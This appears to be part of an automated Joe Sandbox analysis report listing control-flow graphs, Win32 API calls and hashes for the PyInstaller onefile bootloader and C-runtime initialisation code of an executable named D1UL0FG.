SetLastError 15936->15954 15939 7ff67aeeb213 15937->15939 15937->15954 15938->15937 15966 7ff67aeeec08 15939->15966 15942 7ff67aeeb28d 15945 7ff67aeea574 __GetCurrentState 38 API calls 15942->15945 15943 7ff67aeea451 15957 7ff67aeea574 15943->15957 15951 7ff67aeeb292 15945->15951 15946 7ff67aeeb240 FlsSetValue 15949 7ff67aeeb25e 15946->15949 15950 7ff67aeeb24c FlsSetValue 15946->15950 15947 7ff67aeeb230 FlsSetValue 15948 7ff67aeeb239 15947->15948 15973 7ff67aeea9b8 15948->15973 15979 7ff67aeeaf64 15949->15979 15950->15948 15954->15942 15954->15943 16027 7ff67aef36c0 15957->16027 15971 7ff67aeeec19 memcpy_s 15966->15971 15967 7ff67aeeec6a 15987 7ff67aee4f78 15967->15987 15968 7ff67aeeec4e HeapAlloc 15969 7ff67aeeb222 15968->15969 15968->15971 15969->15946 15969->15947 15971->15967 15971->15968 15984 7ff67aef3600 15971->15984 15974 7ff67aeea9ec 15973->15974 15975 7ff67aeea9bd RtlFreeHeap 15973->15975 15974->15954 15975->15974 15976 7ff67aeea9d8 GetLastError 15975->15976 15977 7ff67aeea9e5 __free_lconv_mon 15976->15977 15978 7ff67aee4f78 memcpy_s 9 API calls 15977->15978 15978->15974 16013 7ff67aeeae3c 15979->16013 15990 7ff67aef3640 15984->15990 15996 7ff67aeeb338 GetLastError 15987->15996 15989 7ff67aee4f81 15989->15969 15995 7ff67aef0348 EnterCriticalSection 15990->15995 15997 7ff67aeeb379 FlsSetValue 15996->15997 16002 7ff67aeeb35c 15996->16002 15998 7ff67aeeb38b 15997->15998 16003 7ff67aeeb369 15997->16003 16000 7ff67aeeec08 memcpy_s 5 API calls 15998->16000 15999 7ff67aeeb3e5 SetLastError 15999->15989 16001 7ff67aeeb39a 16000->16001 16004 7ff67aeeb3b8 FlsSetValue 16001->16004 16005 7ff67aeeb3a8 FlsSetValue 16001->16005 16002->15997 16002->16003 16003->15999 16007 7ff67aeeb3c4 FlsSetValue 16004->16007 16008 7ff67aeeb3d6 16004->16008 16006 7ff67aeeb3b1 16005->16006 16009 7ff67aeea9b8 __free_lconv_mon 5 API calls 16006->16009 16007->16006 16010 7ff67aeeaf64 memcpy_s 5 API calls 16008->16010 16009->16003 16011 7ff67aeeb3de 16010->16011 16012 7ff67aeea9b8 
__free_lconv_mon 5 API calls 16011->16012 16012->15999 16025 7ff67aef0348 EnterCriticalSection 16013->16025 16061 7ff67aef3678 16027->16061 16066 7ff67aef0348 EnterCriticalSection 16061->16066 16131 7ff67aedbb50 16132 7ff67aedbb7e 16131->16132 16133 7ff67aedbb65 16131->16133 16133->16132 16136 7ff67aeed66c 16133->16136 16137 7ff67aeed6b7 16136->16137 16141 7ff67aeed67b memcpy_s 16136->16141 16138 7ff67aee4f78 memcpy_s 11 API calls 16137->16138 16140 7ff67aedbbde 16138->16140 16139 7ff67aeed69e HeapAlloc 16139->16140 16139->16141 16141->16137 16141->16139 16142 7ff67aef3600 memcpy_s 2 API calls 16141->16142 16142->16141 19740 7ff67aee9dc0 19743 7ff67aee9d3c 19740->19743 19750 7ff67aef0348 EnterCriticalSection 19743->19750 20594 7ff67aeeb040 20595 7ff67aeeb045 20594->20595 20596 7ff67aeeb05a 20594->20596 20600 7ff67aeeb060 20595->20600 20601 7ff67aeeb0a2 20600->20601 20602 7ff67aeeb0aa 20600->20602 20603 7ff67aeea9b8 __free_lconv_mon 11 API calls 20601->20603 20604 7ff67aeea9b8 __free_lconv_mon 11 API calls 20602->20604 20603->20602 20605 7ff67aeeb0b7 20604->20605 20606 7ff67aeea9b8 __free_lconv_mon 11 API calls 20605->20606 20607 7ff67aeeb0c4 20606->20607 20608 7ff67aeea9b8 __free_lconv_mon 11 API calls 20607->20608 20609 7ff67aeeb0d1 20608->20609 20610 7ff67aeea9b8 __free_lconv_mon 11 API calls 20609->20610 20611 7ff67aeeb0de 20610->20611 20612 7ff67aeea9b8 __free_lconv_mon 11 API calls 20611->20612 20613 7ff67aeeb0eb 20612->20613 20614 7ff67aeea9b8 __free_lconv_mon 11 API calls 20613->20614 20615 7ff67aeeb0f8 20614->20615 20616 7ff67aeea9b8 __free_lconv_mon 11 API calls 20615->20616 20617 7ff67aeeb105 20616->20617 20618 7ff67aeea9b8 __free_lconv_mon 11 API calls 20617->20618 20619 7ff67aeeb115 20618->20619 20620 7ff67aeea9b8 __free_lconv_mon 11 API calls 20619->20620 20621 7ff67aeeb125 20620->20621 20626 7ff67aeeaf04 20621->20626 20640 7ff67aef0348 EnterCriticalSection 20626->20640 19754 7ff67aedcbc0 19755 7ff67aedcbd0 19754->19755 19771 7ff67aee9c18 19755->19771 
19757 7ff67aedcbdc 19777 7ff67aedceb8 19757->19777 19759 7ff67aedd19c 7 API calls 19761 7ff67aedcc75 19759->19761 19760 7ff67aedcbf4 _RTC_Initialize 19769 7ff67aedcc49 19760->19769 19782 7ff67aedd068 19760->19782 19763 7ff67aedcc09 19785 7ff67aee9084 19763->19785 19769->19759 19770 7ff67aedcc65 19769->19770 19772 7ff67aee9c29 19771->19772 19773 7ff67aee4f78 memcpy_s 11 API calls 19772->19773 19776 7ff67aee9c31 19772->19776 19774 7ff67aee9c40 19773->19774 19775 7ff67aeea950 _invalid_parameter_noinfo 37 API calls 19774->19775 19775->19776 19776->19757 19778 7ff67aedcec9 19777->19778 19781 7ff67aedcece __scrt_release_startup_lock 19777->19781 19779 7ff67aedd19c 7 API calls 19778->19779 19778->19781 19780 7ff67aedcf42 19779->19780 19781->19760 19810 7ff67aedd02c 19782->19810 19784 7ff67aedd071 19784->19763 19786 7ff67aee90a4 19785->19786 19800 7ff67aedcc15 19785->19800 19787 7ff67aee90c2 GetModuleFileNameW 19786->19787 19788 7ff67aee90ac 19786->19788 19792 7ff67aee90ed 19787->19792 19789 7ff67aee4f78 memcpy_s 11 API calls 19788->19789 19790 7ff67aee90b1 19789->19790 19791 7ff67aeea950 _invalid_parameter_noinfo 37 API calls 19790->19791 19791->19800 19825 7ff67aee9024 19792->19825 19795 7ff67aee9135 19796 7ff67aee4f78 memcpy_s 11 API calls 19795->19796 19797 7ff67aee913a 19796->19797 19798 7ff67aeea9b8 __free_lconv_mon 11 API calls 19797->19798 19798->19800 19799 7ff67aee914d 19802 7ff67aee919b 19799->19802 19804 7ff67aee91b4 19799->19804 19808 7ff67aee916f 19799->19808 19800->19769 19809 7ff67aedd13c InitializeSListHead 19800->19809 19801 7ff67aeea9b8 __free_lconv_mon 11 API calls 19801->19800 19803 7ff67aeea9b8 __free_lconv_mon 11 API calls 19802->19803 19805 7ff67aee91a4 19803->19805 19804->19804 19806 7ff67aeea9b8 __free_lconv_mon 11 API calls 19804->19806 19807 7ff67aeea9b8 __free_lconv_mon 11 API calls 19805->19807 19806->19808 19807->19800 19808->19801 19811 7ff67aedd03f 19810->19811 19812 7ff67aedd046 19810->19812 19811->19784 19814 7ff67aeea25c 19812->19814 
19817 7ff67aee9e98 19814->19817 19824 7ff67aef0348 EnterCriticalSection 19817->19824 19826 7ff67aee903c 19825->19826 19827 7ff67aee9074 19825->19827 19826->19827 19828 7ff67aeeec08 memcpy_s 11 API calls 19826->19828 19827->19795 19827->19799 19829 7ff67aee906a 19828->19829 19830 7ff67aeea9b8 __free_lconv_mon 11 API calls 19829->19830 19830->19827 18742 7ff67aef0938 18743 7ff67aef095c 18742->18743 18745 7ff67aef096c 18742->18745 18744 7ff67aee4f78 memcpy_s 11 API calls 18743->18744 18767 7ff67aef0961 18744->18767 18746 7ff67aef0c4c 18745->18746 18747 7ff67aef098e 18745->18747 18748 7ff67aee4f78 memcpy_s 11 API calls 18746->18748 18749 7ff67aef09af 18747->18749 18873 7ff67aef0ff4 18747->18873 18750 7ff67aef0c51 18748->18750 18753 7ff67aef0a21 18749->18753 18755 7ff67aef09d5 18749->18755 18759 7ff67aef0a15 18749->18759 18751 7ff67aeea9b8 __free_lconv_mon 11 API calls 18750->18751 18751->18767 18757 7ff67aeeec08 memcpy_s 11 API calls 18753->18757 18771 7ff67aef09e4 18753->18771 18754 7ff67aef0ace 18766 7ff67aef0aeb 18754->18766 18772 7ff67aef0b3d 18754->18772 18888 7ff67aee9730 18755->18888 18760 7ff67aef0a37 18757->18760 18759->18754 18759->18771 18894 7ff67aef719c 18759->18894 18763 7ff67aeea9b8 __free_lconv_mon 11 API calls 18760->18763 18762 7ff67aeea9b8 __free_lconv_mon 11 API calls 18762->18767 18768 7ff67aef0a45 18763->18768 18764 7ff67aef09df 18769 7ff67aee4f78 memcpy_s 11 API calls 18764->18769 18765 7ff67aef09fd 18765->18759 18774 7ff67aef0ff4 45 API calls 18765->18774 18770 7ff67aeea9b8 __free_lconv_mon 11 API calls 18766->18770 18768->18759 18768->18771 18776 7ff67aeeec08 memcpy_s 11 API calls 18768->18776 18769->18771 18773 7ff67aef0af4 18770->18773 18771->18762 18772->18771 18775 7ff67aef344c 40 API calls 18772->18775 18783 7ff67aef0af9 18773->18783 18930 7ff67aef344c 18773->18930 18774->18759 18777 7ff67aef0b7a 18775->18777 18779 7ff67aef0a67 18776->18779 18780 7ff67aeea9b8 __free_lconv_mon 11 API calls 18777->18780 18784 7ff67aeea9b8 __free_lconv_mon 11 
API calls 18779->18784 18785 7ff67aef0b84 18780->18785 18781 7ff67aef0b25 18786 7ff67aeea9b8 __free_lconv_mon 11 API calls 18781->18786 18782 7ff67aef0c40 18787 7ff67aeea9b8 __free_lconv_mon 11 API calls 18782->18787 18783->18782 18788 7ff67aeeec08 memcpy_s 11 API calls 18783->18788 18784->18759 18785->18771 18785->18783 18786->18783 18787->18767 18789 7ff67aef0bc8 18788->18789 18790 7ff67aef0bd0 18789->18790 18791 7ff67aef0bd9 18789->18791 18792 7ff67aeea9b8 __free_lconv_mon 11 API calls 18790->18792 18793 7ff67aeea514 __std_exception_copy 37 API calls 18791->18793 18794 7ff67aef0bd7 18792->18794 18795 7ff67aef0be8 18793->18795 18799 7ff67aeea9b8 __free_lconv_mon 11 API calls 18794->18799 18796 7ff67aef0bf0 18795->18796 18797 7ff67aef0c7b 18795->18797 18939 7ff67aef72b4 18796->18939 18798 7ff67aeea970 _isindst 17 API calls 18797->18798 18801 7ff67aef0c8f 18798->18801 18799->18767 18805 7ff67aef0cb8 18801->18805 18812 7ff67aef0cc8 18801->18812 18803 7ff67aef0c38 18808 7ff67aeea9b8 __free_lconv_mon 11 API calls 18803->18808 18804 7ff67aef0c17 18806 7ff67aee4f78 memcpy_s 11 API calls 18804->18806 18807 7ff67aee4f78 memcpy_s 11 API calls 18805->18807 18809 7ff67aef0c1c 18806->18809 18810 7ff67aef0cbd 18807->18810 18808->18782 18811 7ff67aeea9b8 __free_lconv_mon 11 API calls 18809->18811 18811->18794 18813 7ff67aef0fab 18812->18813 18814 7ff67aef0cea 18812->18814 18815 7ff67aee4f78 memcpy_s 11 API calls 18813->18815 18816 7ff67aef0d07 18814->18816 18958 7ff67aef10dc 18814->18958 18817 7ff67aef0fb0 18815->18817 18820 7ff67aef0d7b 18816->18820 18822 7ff67aef0d2f 18816->18822 18826 7ff67aef0d6f 18816->18826 18818 7ff67aeea9b8 __free_lconv_mon 11 API calls 18817->18818 18818->18810 18824 7ff67aef0da3 18820->18824 18827 7ff67aeeec08 memcpy_s 11 API calls 18820->18827 18841 7ff67aef0d3e 18820->18841 18821 7ff67aef0e2e 18835 7ff67aef0e4b 18821->18835 18842 7ff67aef0e9e 18821->18842 18973 7ff67aee976c 18822->18973 18824->18826 18829 7ff67aeeec08 memcpy_s 11 API calls 
18824->18829 18824->18841 18826->18821 18826->18841 18979 7ff67aef705c 18826->18979 18831 7ff67aef0d95 18827->18831 18834 7ff67aef0dc5 18829->18834 18830 7ff67aeea9b8 __free_lconv_mon 11 API calls 18830->18810 18836 7ff67aeea9b8 __free_lconv_mon 11 API calls 18831->18836 18832 7ff67aef0d39 18837 7ff67aee4f78 memcpy_s 11 API calls 18832->18837 18833 7ff67aef0d57 18833->18826 18840 7ff67aef10dc 45 API calls 18833->18840 18838 7ff67aeea9b8 __free_lconv_mon 11 API calls 18834->18838 18839 7ff67aeea9b8 __free_lconv_mon 11 API calls 18835->18839 18836->18824 18837->18841 18838->18826 18843 7ff67aef0e54 18839->18843 18840->18826 18841->18830 18842->18841 18844 7ff67aef344c 40 API calls 18842->18844 18845 7ff67aef0e5a 18843->18845 18847 7ff67aef344c 40 API calls 18843->18847 18846 7ff67aef0edc 18844->18846 18850 7ff67aef0f9f 18845->18850 18854 7ff67aeeec08 memcpy_s 11 API calls 18845->18854 18848 7ff67aeea9b8 __free_lconv_mon 11 API calls 18846->18848 18851 7ff67aef0e86 18847->18851 18849 7ff67aef0ee6 18848->18849 18849->18841 18849->18845 18853 7ff67aeea9b8 __free_lconv_mon 11 API calls 18850->18853 18852 7ff67aeea9b8 __free_lconv_mon 11 API calls 18851->18852 18852->18845 18853->18810 18855 7ff67aef0f2b 18854->18855 18856 7ff67aef0f33 18855->18856 18857 7ff67aef0f3c 18855->18857 18858 7ff67aeea9b8 __free_lconv_mon 11 API calls 18856->18858 18859 7ff67aef04e4 37 API calls 18857->18859 18860 7ff67aef0f3a 18858->18860 18861 7ff67aef0f4a 18859->18861 18867 7ff67aeea9b8 __free_lconv_mon 11 API calls 18860->18867 18862 7ff67aef0f52 SetEnvironmentVariableW 18861->18862 18863 7ff67aef0fdf 18861->18863 18864 7ff67aef0f76 18862->18864 18865 7ff67aef0f97 18862->18865 18866 7ff67aeea970 _isindst 17 API calls 18863->18866 18868 7ff67aee4f78 memcpy_s 11 API calls 18864->18868 18870 7ff67aeea9b8 __free_lconv_mon 11 API calls 18865->18870 18869 7ff67aef0ff3 18866->18869 18867->18810 18871 7ff67aef0f7b 18868->18871 18870->18850 18872 7ff67aeea9b8 __free_lconv_mon 11 API calls 
18871->18872 18872->18860 18874 7ff67aef1011 18873->18874 18875 7ff67aef1029 18873->18875 18874->18749 18876 7ff67aeeec08 memcpy_s 11 API calls 18875->18876 18881 7ff67aef104d 18876->18881 18877 7ff67aef10ae 18880 7ff67aeea9b8 __free_lconv_mon 11 API calls 18877->18880 18878 7ff67aeea574 __GetCurrentState 45 API calls 18879 7ff67aef10d8 18878->18879 18880->18874 18881->18877 18882 7ff67aeeec08 memcpy_s 11 API calls 18881->18882 18883 7ff67aeea9b8 __free_lconv_mon 11 API calls 18881->18883 18884 7ff67aeea514 __std_exception_copy 37 API calls 18881->18884 18885 7ff67aef10bd 18881->18885 18887 7ff67aef10d2 18881->18887 18882->18881 18883->18881 18884->18881 18886 7ff67aeea970 _isindst 17 API calls 18885->18886 18886->18887 18887->18878 18889 7ff67aee9749 18888->18889 18890 7ff67aee9740 18888->18890 18889->18764 18889->18765 18890->18889 19003 7ff67aee9208 18890->19003 18895 7ff67aef62c4 18894->18895 18896 7ff67aef71a9 18894->18896 18897 7ff67aef62d1 18895->18897 18898 7ff67aef6307 18895->18898 18899 7ff67aee4fbc 45 API calls 18896->18899 18901 7ff67aee4f78 memcpy_s 11 API calls 18897->18901 18907 7ff67aef6278 18897->18907 18900 7ff67aef6331 18898->18900 18908 7ff67aef6356 18898->18908 18904 7ff67aef71dd 18899->18904 18902 7ff67aee4f78 memcpy_s 11 API calls 18900->18902 18905 7ff67aef62db 18901->18905 18906 7ff67aef6336 18902->18906 18903 7ff67aef71e2 18903->18759 18904->18903 18909 7ff67aef71f3 18904->18909 18913 7ff67aef720a 18904->18913 18910 7ff67aeea950 _invalid_parameter_noinfo 37 API calls 18905->18910 18912 7ff67aeea950 _invalid_parameter_noinfo 37 API calls 18906->18912 18907->18759 18917 7ff67aee4fbc 45 API calls 18908->18917 18923 7ff67aef6341 18908->18923 18914 7ff67aee4f78 memcpy_s 11 API calls 18909->18914 18911 7ff67aef62e6 18910->18911 18911->18759 18912->18923 18915 7ff67aef7214 18913->18915 18916 7ff67aef7226 18913->18916 18918 7ff67aef71f8 18914->18918 18920 7ff67aee4f78 memcpy_s 11 API calls 18915->18920 18921 7ff67aef724e 18916->18921 18922 
7ff67aef7237 18916->18922 18917->18923 18919 7ff67aeea950 _invalid_parameter_noinfo 37 API calls 18918->18919 18919->18903 18924 7ff67aef7219 18920->18924 19245 7ff67aef8fbc 18921->19245 19236 7ff67aef6314 18922->19236 18923->18759 18927 7ff67aeea950 _invalid_parameter_noinfo 37 API calls 18924->18927 18927->18903 18929 7ff67aee4f78 memcpy_s 11 API calls 18929->18903 18931 7ff67aef346e 18930->18931 18932 7ff67aef348b 18930->18932 18931->18932 18934 7ff67aef347c 18931->18934 18933 7ff67aef3495 18932->18933 19285 7ff67aef7ca8 18932->19285 19292 7ff67aef7ce4 18933->19292 18936 7ff67aee4f78 memcpy_s 11 API calls 18934->18936 18938 7ff67aef3481 memcpy_s 18936->18938 18938->18781 18940 7ff67aee4fbc 45 API calls 18939->18940 18941 7ff67aef731a 18940->18941 18943 7ff67aef7328 18941->18943 19304 7ff67aeeef94 18941->19304 19307 7ff67aee551c 18943->19307 18946 7ff67aef7414 18948 7ff67aef7425 18946->18948 18950 7ff67aeea9b8 __free_lconv_mon 11 API calls 18946->18950 18947 7ff67aee4fbc 45 API calls 18949 7ff67aef7397 18947->18949 18951 7ff67aef0c13 18948->18951 18953 7ff67aeea9b8 __free_lconv_mon 11 API calls 18948->18953 18952 7ff67aeeef94 5 API calls 18949->18952 18956 7ff67aef73a0 18949->18956 18950->18948 18951->18803 18951->18804 18952->18956 18953->18951 18954 7ff67aee551c 14 API calls 18955 7ff67aef73fb 18954->18955 18955->18946 18957 7ff67aef7403 SetEnvironmentVariableW 18955->18957 18956->18954 18957->18946 18959 7ff67aef111c 18958->18959 18966 7ff67aef10ff 18958->18966 18960 7ff67aeeec08 memcpy_s 11 API calls 18959->18960 18961 7ff67aef1140 18960->18961 18962 7ff67aef11a1 18961->18962 18967 7ff67aeeec08 memcpy_s 11 API calls 18961->18967 18968 7ff67aeea9b8 __free_lconv_mon 11 API calls 18961->18968 18969 7ff67aef04e4 37 API calls 18961->18969 18970 7ff67aef11b0 18961->18970 18972 7ff67aef11c4 18961->18972 18964 7ff67aeea9b8 __free_lconv_mon 11 API calls 18962->18964 18963 7ff67aeea574 __GetCurrentState 45 API calls 18965 7ff67aef11ca 18963->18965 18964->18966 
18966->18816 18967->18961 18968->18961 18969->18961 18971 7ff67aeea970 _isindst 17 API calls 18970->18971 18971->18972 18972->18963 18974 7ff67aee977c 18973->18974 18977 7ff67aee9785 18973->18977 18974->18977 19329 7ff67aee927c 18974->19329 18977->18832 18977->18833 18980 7ff67aef7069 18979->18980 18983 7ff67aef7096 18979->18983 18981 7ff67aef706e 18980->18981 18980->18983 18982 7ff67aee4f78 memcpy_s 11 API calls 18981->18982 18985 7ff67aef7073 18982->18985 18984 7ff67aef70da 18983->18984 18987 7ff67aef70f9 18983->18987 19001 7ff67aef70ce __crtLCMapStringW 18983->19001 18986 7ff67aee4f78 memcpy_s 11 API calls 18984->18986 18988 7ff67aeea950 _invalid_parameter_noinfo 37 API calls 18985->18988 18989 7ff67aef70df 18986->18989 18990 7ff67aef7115 18987->18990 18991 7ff67aef7103 18987->18991 18992 7ff67aef707e 18988->18992 18994 7ff67aeea950 _invalid_parameter_noinfo 37 API calls 18989->18994 18993 7ff67aee4fbc 45 API calls 18990->18993 18995 7ff67aee4f78 memcpy_s 11 API calls 18991->18995 18992->18826 18996 7ff67aef7122 18993->18996 18994->19001 18997 7ff67aef7108 18995->18997 18996->19001 19376 7ff67aef8b78 18996->19376 18998 7ff67aeea950 _invalid_parameter_noinfo 37 API calls 18997->18998 18998->19001 19001->18826 19002 7ff67aee4f78 memcpy_s 11 API calls 19002->19001 19004 7ff67aee9221 19003->19004 19017 7ff67aee921d 19003->19017 19026 7ff67aef2660 19004->19026 19009 7ff67aee9233 19011 7ff67aeea9b8 __free_lconv_mon 11 API calls 19009->19011 19010 7ff67aee923f 19052 7ff67aee92ec 19010->19052 19011->19017 19014 7ff67aeea9b8 __free_lconv_mon 11 API calls 19015 7ff67aee9266 19014->19015 19016 7ff67aeea9b8 __free_lconv_mon 11 API calls 19015->19016 19016->19017 19017->18889 19018 7ff67aee955c 19017->19018 19023 7ff67aee959e 19018->19023 19024 7ff67aee9585 19018->19024 19019 7ff67aef0858 WideCharToMultiByte 19019->19023 19020 7ff67aeeec08 memcpy_s 11 API calls 19020->19023 19021 7ff67aee962e 19022 7ff67aeea9b8 __free_lconv_mon 11 API calls 19021->19022 19022->19024 
19023->19019 19023->19020 19023->19021 19023->19024 19025 7ff67aeea9b8 __free_lconv_mon 11 API calls 19023->19025 19024->18889 19025->19023 19027 7ff67aef266d 19026->19027 19028 7ff67aee9226 19026->19028 19071 7ff67aeeb294 19027->19071 19032 7ff67aef299c GetEnvironmentStringsW 19028->19032 19033 7ff67aee922b 19032->19033 19034 7ff67aef29cc 19032->19034 19033->19009 19033->19010 19035 7ff67aef0858 WideCharToMultiByte 19034->19035 19036 7ff67aef2a1d 19035->19036 19037 7ff67aef2a24 FreeEnvironmentStringsW 19036->19037 19038 7ff67aeed66c _fread_nolock 12 API calls 19036->19038 19037->19033 19039 7ff67aef2a37 19038->19039 19040 7ff67aef2a3f 19039->19040 19041 7ff67aef2a48 19039->19041 19042 7ff67aeea9b8 __free_lconv_mon 11 API calls 19040->19042 19043 7ff67aef0858 WideCharToMultiByte 19041->19043 19044 7ff67aef2a46 19042->19044 19045 7ff67aef2a6b 19043->19045 19044->19037 19046 7ff67aef2a6f 19045->19046 19047 7ff67aef2a79 19045->19047 19049 7ff67aeea9b8 __free_lconv_mon 11 API calls 19046->19049 19048 7ff67aeea9b8 __free_lconv_mon 11 API calls 19047->19048 19050 7ff67aef2a77 FreeEnvironmentStringsW 19048->19050 19049->19050 19050->19033 19053 7ff67aee9311 19052->19053 19054 7ff67aeeec08 memcpy_s 11 API calls 19053->19054 19064 7ff67aee9347 19054->19064 19055 7ff67aeea9b8 __free_lconv_mon 11 API calls 19056 7ff67aee9247 19055->19056 19056->19014 19057 7ff67aee93c2 19058 7ff67aeea9b8 __free_lconv_mon 11 API calls 19057->19058 19058->19056 19059 7ff67aeeec08 memcpy_s 11 API calls 19059->19064 19060 7ff67aee93b1 19230 7ff67aee9518 19060->19230 19061 7ff67aeea514 __std_exception_copy 37 API calls 19061->19064 19064->19057 19064->19059 19064->19060 19064->19061 19065 7ff67aee93e7 19064->19065 19068 7ff67aeea9b8 __free_lconv_mon 11 API calls 19064->19068 19069 7ff67aee934f 19064->19069 19067 7ff67aeea970 _isindst 17 API calls 19065->19067 19066 7ff67aeea9b8 __free_lconv_mon 11 API calls 19066->19069 19070 7ff67aee93fa 19067->19070 19068->19064 19069->19055 19072 7ff67aeeb2a5 
FlsGetValue 19071->19072 19073 7ff67aeeb2c0 FlsSetValue 19071->19073 19074 7ff67aeeb2b2 19072->19074 19075 7ff67aeeb2ba 19072->19075 19073->19074 19076 7ff67aeeb2cd 19073->19076 19077 7ff67aeeb2b8 19074->19077 19078 7ff67aeea574 __GetCurrentState 45 API calls 19074->19078 19075->19073 19079 7ff67aeeec08 memcpy_s 11 API calls 19076->19079 19091 7ff67aef2334 19077->19091 19080 7ff67aeeb335 19078->19080 19081 7ff67aeeb2dc 19079->19081 19082 7ff67aeeb2fa FlsSetValue 19081->19082 19083 7ff67aeeb2ea FlsSetValue 19081->19083 19084 7ff67aeeb318 19082->19084 19085 7ff67aeeb306 FlsSetValue 19082->19085 19086 7ff67aeeb2f3 19083->19086 19087 7ff67aeeaf64 memcpy_s 11 API calls 19084->19087 19085->19086 19088 7ff67aeea9b8 __free_lconv_mon 11 API calls 19086->19088 19089 7ff67aeeb320 19087->19089 19088->19074 19090 7ff67aeea9b8 __free_lconv_mon 11 API calls 19089->19090 19090->19077 19114 7ff67aef25a4 19091->19114 19093 7ff67aef2369 19129 7ff67aef2034 19093->19129 19096 7ff67aeed66c _fread_nolock 12 API calls 19097 7ff67aef2397 19096->19097 19098 7ff67aef239f 19097->19098 19100 7ff67aef23ae 19097->19100 19099 7ff67aeea9b8 __free_lconv_mon 11 API calls 19098->19099 19112 7ff67aef2386 19099->19112 19100->19100 19136 7ff67aef26dc 19100->19136 19103 7ff67aef24aa 19104 7ff67aee4f78 memcpy_s 11 API calls 19103->19104 19106 7ff67aef24af 19104->19106 19105 7ff67aef2505 19113 7ff67aef256c 19105->19113 19147 7ff67aef1e64 19105->19147 19108 7ff67aeea9b8 __free_lconv_mon 11 API calls 19106->19108 19107 7ff67aef24c4 19107->19105 19109 7ff67aeea9b8 __free_lconv_mon 11 API calls 19107->19109 19108->19112 19109->19105 19111 7ff67aeea9b8 __free_lconv_mon 11 API calls 19111->19112 19112->19028 19113->19111 19115 7ff67aef25c7 19114->19115 19118 7ff67aef25d1 19115->19118 19162 7ff67aef0348 EnterCriticalSection 19115->19162 19117 7ff67aef2643 19117->19093 19118->19117 19121 7ff67aeea574 __GetCurrentState 45 API calls 19118->19121 19122 7ff67aef265b 19121->19122 19125 7ff67aef26b2 19122->19125 19126 
(continuation of the preceding function's control-flow graph; the rendered node/edge list is not reproduced)

Win32 APIs referenced by the remaining nodes: GetOEMCP, GetACP, IsValidCodePage, GetCPInfo, EnterCriticalSection, MultiByteToWideChar, WideCharToMultiByte, LCMapStringW, CompareStringW, LoadLibraryExW, GetProcAddress, FreeLibrary, GetLastError, HeapSize, HeapReAlloc, GetEnvironmentStringsW, FreeEnvironmentStringsW.
CRT internals on the same paths: memcpy_s, _log10_special, _fread_nolock, __free_lconv_mon, __crtLCMapStringW, __vcrt_InitializeCriticalSectionEx, _invalid_parameter_noinfo, _isindst. Taken together this is C-runtime code-page, locale and environment-block initialisation (LCMapStringW/CompareStringW are reached through __crtLCMapStringW, which resolves them with LoadLibraryExW/GetProcAddress), not sample-specific logic.

Control-flow Graph: function at 0x7ff67aed8bd0 (the rendered graph's Executed / Not Executed node colouring and edge list are not reproduced)

The API call sequence the graph shows, in path order:
• entry: SetConsoleCtrlHandler, GetStartupInfoW, three rounds of internal calls (7ff67aee5460, 7ff67aeea4ec, 7ff67aee878c), GetCommandLineW, CreateProcessW
• CreateProcessW failure: GetLastError, internal error reporting (7ff67aed2c50), then the common exit (7ff67aedc5c0)
• CreateProcessW success: RegisterClassW, CreateWindowExW, ShowWindow (a GetLastError node on each failure, after which execution continues), then WaitForSingleObject on the child
• wait loop: WaitForSingleObject, PeekMessageW / TranslateMessage / DispatchMessageW, QueryPerformanceFrequency / QueryPerformanceCounter, MsgWaitForMultipleObjects, GetMessageW
• shutdown path: a further WaitForSingleObject, TerminateProcess on the child (GetLastError on failure), WaitForSingleObject again
• exit: DestroyWindow, GetExitCodeProcess, CloseHandle * 2, common exit (7ff67aedc5c0)

With the strings below ("PyInstaller Onefile Hidden Window", "Failed to create child process!") this is the PyInstaller onefile parent: it launches the unpacked child with CreateProcessW, keeps a hidden message-pumping window alive while it waits, and terminates the child if the parent is asked to shut down first.
Memory Dump Source
• Source File: 00000005.00000002.3019440736.00007FF67AED1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF67AED0000, based on PE: true
• Associated: 00000005.00000002.3019253519.00007FF67AED0000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.3019597939.00007FF67AEFB000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.3019759926.00007FF67AF0E000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.3019759926.00007FF67AF12000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.3020018200.00007FF67AF14000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_7ff67aed0000_D1UL0FG.jbxd
Similarity
• API ID: Message$ErrorLast$ObjectProcessSingleWait$CloseCreateHandlePeekWindow_invalid_parameter_noinfo$ByteCharClassCodeCommandConsoleCtrlCurrentDestroyDispatchExitFormatHandlerInfoLineMultiRegisterStartupTerminateTranslateWide
• String ID: CreateProcessW$Failed to create child process!$PyInstaller Onefile Hidden Window$PyInstallerOnefileHiddenWindow
• API String ID: 3832162212-3165540532
• Opcode ID: f1b4a1f9842ac9cce6b2798ee34386867a7882a0850fd65476f94626d3f01840
• Instruction ID: 69b5a666fe98631bca6c1411317543d8f2af48f00ae4850d0e564a3bbcc7d722
• Opcode Fuzzy Hash: f1b4a1f9842ac9cce6b2798ee34386867a7882a0850fd65476f94626d3f01840
• Instruction Fuzzy Hash: 14D19133A28A8286EB50AF74E8542AD3764FF84B58F504279DE5D83AB4DF3CD544DB00

Control-flow Graph: function at 0x7ff67aed1000 (the rendered graph's Executed / Not Executed node colouring and edge list are not reproduced)

Win32 APIs visible in the graph: SetDllDirectoryW (two call sites) and LoadLibraryExW for DLL search-path setup, and PostMessageW followed by GetMessageW at two call sites. Every other node is an internal call; the node at 7ff67aed3f64-7ff67aed3fa0 calls 7ff67aed8bd0, the hidden-window child launcher summarised in the previous graph. The referenced strings below (PYINSTALLER_RESET_ENVIRONMENT, _PYI_ARCHIVE_FILE, _PYI_PARENT_PROCESS_LEVEL, "Could not load PyInstaller's embedded PKG archive from the executable (%s)", and the rest) identify this as the PyInstaller onefile bootloader's main routine, which locates the embedded PKG archive, creates the temporary extraction directory and decides whether it is the parent or the onefile child.
Memory Dump Source
• Source File: 00000005.00000002.3019440736.00007FF67AED1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF67AED0000, based on PE: true
• Associated: 00000005.00000002.3019253519.00007FF67AED0000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.3019597939.00007FF67AEFB000.00000002.00000001.01000000.0000000A.sdmp
